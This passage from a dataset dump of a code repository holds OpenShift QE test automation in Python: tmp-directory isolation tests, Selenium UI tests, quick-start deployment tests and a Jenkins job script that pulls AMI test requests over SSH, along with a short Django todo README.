%(WORK_DIR, file_name)\n self.target_file1 = \"%s/wsgi/application\" %(self.app_name1)\n self.target_file2 = \"%s/wsgi/application\" %(self.app_name2)\n self.url_path1 = \"create\"\n self.url_path2 = \"show\"\n elif test_name == \"perl\":\n file_name = \"polyinstantiation_tmp_dir_index.pl\"\n self.source_file = \"%s/data/%s\" %(WORK_DIR, file_name)\n self.target_file1 = \"%s/perl/index.pl\" %(self.app_name1)\n self.target_file2 = \"%s/perl/index.pl\" %(self.app_name2)\n self.url_path1 = \"index.pl?action=create\"\n self.url_path2 = \"index.pl\"\n elif test_name == \"rack\":\n file_name = \"polyinstantiation_tmp_dir_rack/*\"\n self.source_file = \"%s/data/%s\" %(WORK_DIR, file_name)\n self.target_file1 = \"%s/\" %(self.app_name1)\n self.target_file2 = \"%s/\" %(self.app_name2)\n self.url_path1 = \"create\"\n self.url_path2 = \"show\" \n else:\n raise TestSuiteAbort(\"unknown variant: %s\"%self.test_variant)\n\n tcms_testcase_id=122331\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s %s\"%(self.app_name1, self.app_name2))\n\nclass PolyinstantiantionTmpDir(OpenShiftTest):\n def test_method(self):\n self.info(\"1. Create a %s application\" %(self.app_type))\n ret = common.create_app(self.app_name1, self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(0, ret, \"App#1 should be created successfully\") \n\n self.info(\"2. Copying test files to app git repo\")\n ret = common.command_get_status(\"cp -f %s %s\" %(self.source_file, self.target_file1))\n self.assert_equal(0, ret)\n\n self.info(\"3. Do git commit\")\n ret = common.command_get_status(\"cd %s && git add . && git commit -m test && git push\" %(self.app_name1))\n self.assert_equal(0, ret, \"File and directories are added to your git repo successfully\")\n\n app_url = OSConf.get_app_url(self.app_name1)\n\n self.info(\"4. Access app's URL to create files in tmp directory\")\n ret = common.grep_web_page(\"%s/%s\" %(app_url, self.url_path1), [\"RESULT=0\"])\n\n self.assert_equal(0, ret, \"RESULT=0 should be seen in output of %s\"%app_url)\n\n self.info(\"5. Create another %s application\" %(self.app_type))\n ret = common.create_app(self.app_name2, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(0, ret, \"App#2 should be created successfully\")\n\n self.info(\"6. Copying test files to app git repo\")\n common.command_get_status(\"cp -f %s %s\" %(self.source_file, self.target_file2))\n self.assert_equal(0, ret, \"Copy should be done.\")\n\n\n self.info(\"7. Do git commit\")\n ret = common.command_get_status(\"cd %s && git add . && git commit -m test && git push\" %(self.app_name2))\n self.assert_equal(0, ret, \"File and directories are added to your git repo successfully\")\n\n self.info(\"8. Get app url\")\n app_url = OSConf.get_app_url(self.app_name2)\n \n self.info(\"9. Access app's URL to check files in tmp directory\")\n common.grep_web_page(\"%s/%s\" %(app_url, self.url_path2), \n [\"RESULT=1\", \"No such file or directory\"])\n self.assert_equal(ret, 0,\"Files is created in tmp directory\")\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PolyinstantiantionTmpDir)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5949074029922485, "alphanum_fraction": 0.6211419701576233, "avg_line_length": 20.94915199279785, "blob_id": "38d2534d854a00ad24c4c8dcb4c9a1de47af5e35", "content_id": "799a1d1e02116d46b7e21cd562d9dc7893e2880d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1296, "license_type": "no_license", "max_line_length": 94, "num_lines": 59, "path": "/automation/open/testmodules/UI/web/case_122423.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_122423.py\n# Date: 2012/07/24 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Create_app_blank_name(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Create app with blank name\n web.assert_text_equal_by_xpath('''MANAGEMENT CONSOLE''',\n '''//div/span''')\n web.go_to_create_drupal()\n web.click_element_by_id('application_submit')\n time.sleep(5)\n web.assert_text_equal_by_xpath('''Application name is required and cannot be blank''',\n '''//form[@id='new_application']/ul/li''') \n\n self.tearDown()\n\n return self.passed(\"Case 122423 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Create_app_blank_name)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_122423.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6305501461029053, "alphanum_fraction": 0.643395721912384, "avg_line_length": 42.93251419067383, "blob_id": "90ed095704f22bad1d84f423c5b3cab2497bf52b", "content_id": "383c3a828faedf8b970c8c4fe54fdb84e3fc62e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7162, "license_type": "no_license", "max_line_length": 150, "num_lines": 163, "path": "/automation/open/testmodules/UI/web/tc_createdomain.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport config\nimport random\nimport HTMLTestRunner\n\n\nclass CreateDomain(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n self.domain=self.generate_domain_name()\n self.sshkey=self.ssh_key(\"id_rsa.pub\")\n \n def generate_domain_name(self):\n i=random.uniform(1,10)\n domain_name=\"test\"+str(i)[2:10]\n return domain_name\n\n def generate_new_sshkey(self,ssh_key_file):\n i=random.uniform(1,10)\n h = open(ssh_key_file, 'rb')\n _oldssh=h.read()\n _newssh=_oldssh[0:366]+str(i)[2:10]\n return _newssh\n\n def ssh_key(self,ssh_key_file):\n f = open(ssh_key_file, 'rb')\n ssh=f.read()\n # print ssh\n return ssh\n\n \n\n def create_domain(self,domain_name):\n baseutils.go_to_home(self)\n time.sleep(4)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.domainuser[0],config.domainuser[1])\n baseutils.go_to_express_console(self)\n baseutils.scroll_bar(self)\n # baseutils.click_element_by_link_text(self,\"Express Console\")\n time.sleep(5)\n '''\n if config.proxy == 1:\n baseutils.click_element_by_link_text(self,\"Looking for OpenShift Flex?\")\n time.sleep(15)\n try: self.assertEqual(\"https://stg.openshift.redhat.com/flex/flex/index.html\", self.driver.current_url())\n except AssertionError as e: self.verificationErrors.append(str(e))\n baseutils.go_back(self)\n else: baseutils.assert_element_present_by_link_text(self,\"Looking for OpenShift Flex?\")\n '''\n baseutils.assert_text_equal_by_css(self,\"Control Panel\",\"section.main > header > h1\")\n # baseutils.assert_text_equal_by_xpath(self,\"Desired domain name*\",\"//li[@id='express_domain_namespace_input']/label\")\n baseutils.click_element_by_link_text(self,\"Edit...\")\n time.sleep(5)\n baseutils.wait_element_present_by_id(self,\"express_domain_namespace\")\n baseutils.input_by_id(self,\"express_domain_namespace\",domain_name)\n# baseutils.input_by_id(self,\"express_domain_ssh\",ssh)\n self.driver.execute_script(\"window.scrollTo(0, 0);\")\n baseutils.click_element_by_xpath(self,\"//div[5]/div/div/form/fieldset/ol/li/input\")\n \n def test_a_create_domain_no_domain_name(self):\n self.create_domain(\"\")\n baseutils.assert_text_equal_by_xpath(self,\"THIS FIELD IS REQUIRED.\",\".//*[@id='express_domain_namespace_input']/label[2]\")\n\n \n# def test_b_create_domain_no_ssh_key(self):\n# self.create_domain(self.domain,\"\")\n# baseutils.assert_text_equal_by_css(self,\"This field is required.\",\"#express_domain_ssh_input > label.error\")\n\n def test_c_create_domain_with_blacklist(self):\n self.create_domain(\"jboss\")\n baseutils.assert_text_equal_by_css(self,\"Namespace jboss is not permitted\",\"div.error.message\")\n \n def test_d_create_domain_with_nonalpha(self):\n self.create_domain(\"test_55\")\n baseutils.assert_text_equal_by_css(self,\"ONLY LETTERS AND NUMBERS ARE ALLOWED\",\"label.error\")\n \n def test_e_create_domain_with_over16charater(self):\n self.create_domain(\"abcdefg1234567890\")\n baseutils.assert_value_equal_by_id(self,\"abcdefg123456789\",\"express_domain_namespace\")\n\n \n def test_f_create_domain_with_existing_name(self):\n self.create_domain(config.exist_domain)\n time.sleep(5)\n baseutils.assert_text_equal_by_xpath(self,\"A namespace with name \\'\"+config.exist_domain+\"\\' already exists\",\"//div[@id='cp-dialog']/div/div\")\n '''\n def test_g_create_domain_normally(self):\n domain_name=self.generate_domain_name()\n domain_name2=domain_name\n self.create_domain(self.domain)\n time.sleep(10)\n baseutils.go_to_home(self)\n baseutils.go_to_express_console(self)\n baseutils.scroll_bar(self)\n baseutils.assert_text_equal_by_xpath(self,domain_name2,\"//div[@id='domains']/div[2]/div\")\n '''\n def test_h_change_domain_name(self):\n baseutils.go_to_home(self)\n time.sleep(4)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.domainuser[0],config.domainuser[1])\n baseutils.go_to_express_console(self)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_xpath(self,\"//div[@id='domains']/div[2]/div[2]/div/a\")\n while self.driver.current_url not in [self.base_url+\"/app/dashboard\",self.base_url+\"/app/control_panel\"]:\n baseutils.go_to_express_console(self) \n try:\n while (not baseutils.assert_element_present_by_id(\"express_domain_namespace\")):\n baseutils.click_element_by_xpath(self,\"//div[@id='domains']/div[2]/div[2]/div/a\")\n except:pass\n _value=self.driver.find_element_by_id(\"express_domain_namespace\").get_attribute(\"value\")\n _newvalue=_value[:len(_value)-1]\n baseutils.input_by_id(self,\"express_domain_namespace\",_newvalue)\n baseutils.click_element_by_xpath(self,\"//div[5]/div/div/form/fieldset/ol/li/input\")\n time.sleep(5)\n baseutils.assert_text_equal_by_css(self,_newvalue,\"div.current.domain\")\n \n def test_i_create_domain_sshkey(self):\n baseutils.go_to_home(self)\n time.sleep(4)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.tochangepwduser[0],config.tochangepwduser[1])\n baseutils.go_to_express_console(self)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_xpath(self,\".//div[@id='ssh_container']/div/div[2]/div/a\")\n _newssh=self.ssh_key(\"id2_rsa.pub\")\n baseutils.input_by_id(self,\"ssh_form_express_domain_ssh\",_newssh)\n baseutils.click_element_by_xpath(self,\"//div[5]/div/div/form/fieldset/ol/li/input\")\n time.sleep(5)\n baseutils.assert_text_equal_by_css(self,_newssh[0:20]+\"...\",\"div.current.ssh\")\n \n def test_j_change_domain_sshkey(self):\n baseutils.go_to_home(self)\n time.sleep(4)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.tochangepwduser[0],config.tochangepwduser[1])\n baseutils.go_to_express_console(self)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_xpath(self,\".//div[@id='ssh_container']/div/div[2]/div/a\")\n _newssh=self.generate_new_sshkey(\"id2_rsa.pub\")\n# _changessh=_newssh[1:374]+\"a\"\n baseutils.input_by_id(self,\"ssh_form_express_domain_ssh\",_newssh)\n baseutils.click_element_by_xpath(self,\"//div[5]/div/div/form/fieldset/ol/li/input\")\n time.sleep(5)\n baseutils.assert_text_equal_by_css(self,_newssh[0:20]+\"...\",\"div.current.ssh\")\n\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n # HTMLTestRunner.main() \n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6399999856948853, "avg_line_length": 15.399999618530273, "blob_id": "cdbf05dd5b5cf90616e716bddd185606eebcf4e7", "content_id": "a205b4dff1e7f0e4c586404f4299d54bcb267947", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 237, "license_type": "no_license", "max_line_length": 50, "num_lines": 10, "path": "/simpletodo/README.md", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "Django-Simple-Todo\r\n==================\r\n\r\nsimple-todo dajngo版\r\n\r\n使用的环境: fedora 17 + django1.4 + python2.7 + sqlite3\r\n\r\n前端使用的 bootstrap + jquery\r\n\r\n实现添加修改删除 ajax支持 可自行添加用户控制 \r\n" }, { "alpha_fraction": 0.6133518815040588, "alphanum_fraction": 0.6133518815040588, "avg_line_length": 34.36065673828125, "blob_id": "0c87fa0842148acf01dde33e34f971b37a577508", "content_id": "a21d9e723180e391cd7af7e272839ee061d9d555", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2157, "license_type": "no_license", "max_line_length": 206, "num_lines": 61, "path": "/automation/open/testmodules/RT/quick_start/quick_start_redmine.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport OSConf\nimport rhtest\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartRedmine(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"ruby\"]\n self.config.application_embedded_cartridges = [ common.cartridge_types['mysql'] ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: Redmine\"\n self.config.git_upstream_url = \"git://github.com/openshift/redmine-openshift-quickstart.git\"\n self.config.page = \"\" # means '/'\n self.config.page_pattern = r\"(Projects|Sign in|Redmine|Register)\"\n \n def pre_configuration_steps(self):\n self.log_info(\"Pre-configuration steps...\")\n steps = [\n \"cd %s\" % self.config.application_name,\n \"rm -Rfv *\"\n ]\n common.command_get_status(\" && \".join(steps))\n \n def post_configuration_steps(self):\n self.log_info(\"Post-configuration steps...\")\n mysql = OSConf.get_embed_info(self.config.application_name, common.cartridge_types['mysql'])\n steps = [\n \"cd %s\" % self.config.application_name,\n \"sed -i -e 's/password:.*/password: %s/' -e 's/database: redmine/database: %s/' -e 's/host:.*/host: %s/' config/database.yml\" % ( mysql[\"password\"], self.config.application_name, mysql[\"url\"] ) \n ]\n common.command_get_status(\" && \".join(steps))\n \n def pre_deployment_steps(self):\n self.log_info(\"Pre-deloyment steps...\")\n steps = [\n \"cd %s\" % self.config.application_name,\n \"git add .\",\n \"git commit -a -m db_changes\" \n ]\n common.command_get_status(\" && \".join(steps))\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartRedmine)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5967914462089539, "alphanum_fraction": 0.605704128742218, "avg_line_length": 27.040000915527344, "blob_id": "9f625877563df7a83c87cfb3f39f7f8a0616c335", "content_id": "377835ced4a1d95c8c89f6dee33e99eb13ee9bfa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2805, "license_type": "no_license", "max_line_length": 122, "num_lines": 100, "path": "/automation/open/testmodules/RT/cartridge/valid_descriptor_manifest.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n#\n# File name: valid_descriptor_manifest.py\n# Date: 2012/02/24 04:21\n# Author: [email protected]\n#\n\nimport sys\nimport os\nimport testcase\nimport common\nimport commands\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = \"DEV\"\n INTERACTIVE = False\n\n def initialize(self):\n self.summary =\"[rhc-cartridge][US-1664] Valid cartridge descriptor mainfest.yaml\"\n self.tcms_testcase_id = 128860\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass ValidDescriptorManifest(OpenShiftTest):\n\n def test_method(self):\n (status, output) = common.run_remote_cmd_as_root('rpm -qa | grep ^openshift-origin-cartridge- | grep -v abstract')\n if status!=0:\n self.error('Unable get the list of cartridges...')\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n cartridges = output.splitlines()\n for cart in cartridges:\n rpm = RPMPackage(cart)\n #print 'Cartridge RPM: ' + cart\n #print \" Manifest.yml exists? \",\n self.steps_list.append(testcase.TestCaseStep(\"Valid descriptors for %s\"%cart, \n rpm.existManifestFile,\n function_parameters=[], \n expect_return=True))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass RPMPackage:\n\n def __init__(self, package):\n self.package = package\n self.manifestfile = None\n\n def getFileList(self):\n #return commands.getoutput('rpm -ql ' + self.package).splitlines()\n (status, output) = common.run_remote_cmd_as_root('rpm -ql ' + self.package)\n return output.splitlines()\n\n def getManifestFilePath(self):\n return self.manifestfile\n\n def existManifestFile(self):\n filelist = self.getFileList()\n existManifestFile = False\n for file in filelist:\n if file.endswith('manifest.yml'):\n existManifestFile = True\n self.manifestfile = file\n break\n return existManifestFile\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ValidDescriptorManifest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of valid_descriptor_manifest.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6327834129333496, "alphanum_fraction": 0.6327834129333496, "avg_line_length": 32.55356979370117, "blob_id": "be1c46d50fa3c50e2bf67c710b11c9398b2e7eb6", "content_id": "2f52fe76dec53dabab1da479958134476d0989ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1879, "license_type": "no_license", "max_line_length": 100, "num_lines": 56, "path": "/automation/open/testmodules/RT/quick_start/quick_start_diy_java_demo.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport rhtest\n# user defined packages\nfrom quick_start_test import QuickStartTest\n\n\nclass QuickStartDiyJavaDemo(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"diy\"]\n self.config.application_embedded_cartridges = [ ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: Openshift-diy-java-demo\"\n self.config.git_upstream_url = \"git://github.com/openshift/openshift-diy-java-demo.git\"\n self.config.random_string = common.getRandomString()\n self.config.page = \"test.html\"\n self.config.page_pattern = self.config.random_string\n \n def post_configuration_steps(self):\n self.log_info(\"Steps after configuration\")\n print \"Creating test.html file\"\n test_html = open(\"%s/html/test.html\" % self.config.application_name, \"w\")\n test_html.write(\"<html>\\n\")\n test_html.write(\"<head><title>Testing</title></header>\\n\")\n test_html.write(\"<body><p>%s</p></body\\n>\" % self.config.random_string)\n test_html.write(\"</html>\\n\")\n test_html.close()\n \n def pre_deployment_steps(self):\n self.log_info(\"Step before deploying\")\n steps = [\n \"cd %s\" % self.config.application_name,\n \"git add .\",\n \"git commit -a -m testing\" \n ]\n ret_code = common.command_get_status(\" && \".join(steps))\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartDiyJavaDemo)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5440176725387573, "alphanum_fraction": 0.5499051809310913, "avg_line_length": 47.5758171081543, "blob_id": "393ed7e263f8640315d7a2584d5fe14448325fab", "content_id": "b8eeb5d6ca57434b298cb385af87d1b6ddec83d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25308, "license_type": "no_license", "max_line_length": 319, "num_lines": 521, "path": "/automation/open/bin/pretestingjob.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport sys\nimport commands\nimport re\nimport time\nimport yaml\nimport random\nimport string\nimport fcntl\nimport pymongo\nfrom urllib import quote, unquote\nfrom pymongo.errors import *\nfrom bson.objectid import ObjectId\n\nSCRIPT_PATH = os.path.abspath(os.path.dirname(__file__))\n\nclass DotDict(object):\n\n def __getattr__(self, name):\n return self.data[name]\n\n def __setattr__(self, name, value):\n if not self.__dict__.has_key('data'):\n self.__dict__['data'] = {}\n self.__dict__['data'][name] = value\n\n\nclass DefaultValueDict(dict):\n DEFAULT = {'instance_count' : 1, 'job_count' : 2}\n\n def __getitem__(self, key):\n if not self.has_key(key):\n return DefaultValueDict.DEFAULT\n else:\n return super(DefaultValueDict, self).__getitem__(key)\n\nclass PreTestingJob(object):\n KEY_PATH = os.path.join(SCRIPT_PATH, '..', 'etc', 'libra.pem')\n IP_ADDR = '184.73.182.48'\n FILE_PATH = '/var/lib/jenkins/fork_ami_qe_test_queue'\n TESTPLAN_ID = '4962'\n PLAN = DefaultValueDict({ 'fullfunction' : {'instance_count' : 2, 'job_count' : 6},\n 'stage' : {'instance_count' : 2, 'job_count' : 6},\n 'acceptance' : {'instance_count' : 2, 'job_count' : 4},\n 'smoke' : {'instance_count' : 1, 'job_count' : 2},\n })\n\n def __init__(self):\n # Change key file permission\n os.system(\"chmod 600 %s\" % (PreTestingJob.KEY_PATH))\n # Setup environment variables\n os.environ['RHTEST_HOME'] = os.path.abspath(os.curdir)\n os.environ['PATH'] = os.path.expandvars(os.path.expanduser('${RHTEST_HOME}/bin:${RHTEST_HOME}/lib:${RHTEST_HOME}/lib/supports:${RHTEST_HOME}/testmodules:$PATH'))\n os.environ['PYTHONPATH'] = os.path.expandvars(os.path.expanduser('${RHTEST_HOME}/bin:${RHTEST_HOME}/lib:${RHTEST_HOME}/lib/supports:${RHTEST_HOME}/testmodules:$PYTHONPATH'))\n # Init kerberos\n if not self.init_kerberos():\n print 'Failed to init kerberos. Please check your TCMS_USER and TCMS_PASSWORD'\n sys.exit(255)\n # Init parameters\n self.init_params()\n if not self.preprocess():\n sys.exit(255)\n # Connect to mongodb\n mongo_url = os.environ['MONGO_CONN_URL']\n try:\n self.conn = pymongo.Connection('mongodb://%s' % (mongo_url))\n except ConnectionFailure:\n print 'Error: Failed to connect to MongoDB at %s. Please check your system configurations.' % (mongo_url)\n sys.exit(255)\n self.db = self.conn['devenv']\n\n def __del__(self):\n # Disconnect from MongoDB\n if hasattr(self, 'conn'):\n self.conn.close()\n\n def get_instance_tag(self, ami_id):\n return 'QE_auto_%s' % (ami_id)\n\n def get_testrun_tag(self, testcase_tags, ami_id=None):\n result = 'Test Run for %s Testing' % (testcase_tags)\n if ami_id == None:\n return result\n else:\n return ' - '.join([result, ami_id])\n\n def get_ami_tags(self): # get ami_id and testcase_tags from remote machine for fork ami testing\n # Get lock\n try:\n f = file(\".trigger.lock\", \"w\")\n fcntl.flock(f, fcntl.LOCK_EX)\n except IOError, e:\n fcntl.flock(f, fcntl.LOCK_UN)\n print \"Failed to create lock file\\n\", e\n return None\n except ValueError, e:\n print 'Failed to get lock\\n', e\n f.close()\n return None\n # Get the first line\n cmd = 'ssh -t -t -q -i %s -o StrictHostKeyChecking=no -o ConnectTimeout=20 root@%s \\\"head -n 1 %s\\\"' % ( PreTestingJob.KEY_PATH,\n PreTestingJob.IP_ADDR,\n PreTestingJob.FILE_PATH)\n (ret, output) = commands.getstatusoutput(cmd)\n if ret != 0:\n print 'Failed to get the first line of %s on %s' % (PreTestingJob.FILE_PATH, PreTestingJob.IP_ADDR)\n fcntl.flock(f, fcntl.LOCK_UN)\n f.close()\n return None\n try:\n print \"The first line of remote file:\\n%s\\n\" % (output)\n # Get ami id and test tags\n output = output.strip().replace(' ','')\n match = re.search(r'([\\w\\-_]+)=(\\w+[\\w,]*)', output, re.M)\n ami_id = match.group(1)\n testcase_tags = match.group(2)\n print '\\nFound ami id and test case tags in remote file'\n print 'ami id: %s, test case tags: %s\\n' % (ami_id, testcase_tags)\n except AttributeError, e:\n print \"No fork ami found in remote file. The job will quit.\"\n sys.exit(0)\n finally:\n # Remove the first line\n cmd = \"ssh -t -t -q -i %s -o StrictHostKeyChecking=no -o ConnectTimeout=20 root@%s \\\"sed -i -e '1 d' %s\\\"\" % ( PreTestingJob.KEY_PATH,\n PreTestingJob.IP_ADDR,\n PreTestingJob.FILE_PATH)\n (ret, output) = commands.getstatusoutput(cmd)\n if ret != 0:\n print 'Warning!!! Failed to delete the first line of %s on %s' % (PreTestingJob.FILE_PATH, PreTestingJob.IP_ADDR)\n # Release lock\n fcntl.flock(f, fcntl.LOCK_UN)\n f.close()\n return (ami_id, testcase_tags)\n\n def get_build_uuid(self, length = 32):\n random.seed()\n return random.choice(string.ascii_lowercase) + ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(0, length-1))\n\n def get_instance_count(self, testcase_tags):\n for testcase_tag in ['fullfunction', 'stage', 'acceptance', 'smoke']:\n if testcase_tag in testcase_tags:\n return PreTestingJob.PLAN[testcase_tag]['instance_count']\n return DefaultValueDict.DEFAULT['instance_count']\n\n def get_job_count(self, testcase_tags):\n for testcase_tag in ['fullfunction', 'stage', 'acceptance', 'smoke']:\n if testcase_tag in testcase_tags:\n return PreTestingJob.PLAN[testcase_tag]['job_count']\n return DefaultValueDict.DEFAULT['job_count']\n\n def user_email_generator(self, prototype):\n if '@' in prototype:\n parts = prototype.split('@')\n else:\n parts = [prototype, 'redhat.com']\n i = 1\n while True:\n first_part = ''.join([parts[0], '+%d' % (i)])\n yield '@'.join([first_part, parts[1]])\n i += 1\n\n def get_users(self, count=None):\n result = {}\n if self.config.openshift_users != None:\n for pair in self.config.openshift_users.splitlines():\n try:\n [email, passwd] = pair.split(':')\n except ValueError:\n print 'Invalid OPENSHIFT_USERS'\n return None\n result[email] = passwd\n elif self.config.openshift_user_prototype != None:\n if count == None:\n return None\n try:\n [email, passwd] = self.config.openshift_user_prototype.split(':')\n except ValueError:\n print 'Invalid OPENSHIFT_USER_PROTOTYPE'\n return None\n iuser = self.user_email_generator(email)\n for i in range(count):\n result[iuser.next()] = passwd\n else:\n return None\n return result\n\n def init_kerberos(self):\n cmd = 'cd bin/ && ./kinit.sh'\n if os.system(cmd) != 0:\n return False\n return True\n\n def init_params(self):\n self.config = DotDict()\n self.param_list = ['INSTANCES', 'INSTANCE_TAG', 'AMI_ID', 'TESTRUN_ID', 'TESTRUN_TAG', 'TESTCASE_TAGS', 'SUB_JOB_NAME', 'INSTANCE_COUNT', 'JOB_COUNT', 'OPENSHIFT_USER_PROTOTYPE', 'OPENSHIFT_USERS', 'SHUTDOWN_INSTANCE', 'RESET_TESTRUN', 'UPDATE_CLIENT', 'RHC_VERSION', 'RHC_BRANCH', 'TCMS_USER', 'TCMS_PASSWORD']\n for param in self.param_list:\n setattr(self.config, param.lower(), os.environ.get(param))\n\n def strip_params(self):\n # Remove spaces from parameters\n for param in self.param_list:\n value = getattr(self.config, param.lower())\n if value != None:\n if param in ['INSTANCES', 'TESTCASE_TAGS', 'OPENSHIFT_USERS']:\n value = value.replace(' ', '')\n else:\n value = value.strip()\n if value != '':\n if param in ['INSTANCE_COUNT', 'JOB_COUNT']:\n try:\n setattr(self.config, param.lower(), int(value))\n except ValueError:\n print 'Invalid parameter: INSTANCE_COUNT or JOB_COUNT. They must be numbers'\n return False\n else:\n setattr(self.config, param.lower(), value)\n else:\n setattr(self.config, param.lower(), None)\n return True\n\n def preprocess(self):\n if not self.strip_params():\n return False\n if self.config.tcms_user == None or self.config.tcms_password == None:\n print 'TCMS_USER and TCMS_PASSWORD are needed'\n return False\n if self.config.reset_testrun not in ['true', 'false']:\n print 'RESET_TESTRUN can only be one of \"true\" and \"false\"'\n return False\n if self.config.shutdown_instance not in ['true', 'false']:\n print 'SHUTDOWN_INSTANCE can only be one of \"true\" and \"false\"'\n return False\n # Check if it's possible to get/generate openshift users\n if self.config.openshift_users == None:\n if self.config.openshift_user_prototype == None:\n self.config.openshift_user_prototype = \"openshift\" + self.get_build_uuid(6) + \"@redhat.com:redhat\"\n print 'Generated random OPENSHIFT_USER_PROTOTYPE: %s' % (self.config.openshift_user_prototype)\n # fork ami test. Get ami_id and testcase_tags from remote\n if self.config.instances == None and self.config.ami_id == None and self.config.testrun_id == None and self.config.testcase_tags == None:\n try:\n (self.config.ami_id, self.config.testcase_tags) = self.get_ami_tags()\n except TypeError:\n print 'Error: Failed to get AMI_ID and TESTCASE_TAGS from remote.'\n sys.exit(0)\n # Check if it's possible to get/create test run with current parameters\n if self.config.testrun_id == None:\n if self.config.testcase_tags == None:\n print \"Please specify TESTCASE_TAGS or provide TESTRUN_ID\"\n return False\n # Check if it's possible to get/create instances with current parameters\n if self.config.instances == None:\n if self.config.ami_id == None:\n print 'Please specify AMI_ID or provide existing INSTANCES'\n return False\n # Check if it's possible to get/calculate instance count with current parameters\n if self.config.instances == None:\n if self.config.instance_count == None:\n if self.config.testcase_tags == None:\n print 'Error: Please provide INSTANCE_COUNT or 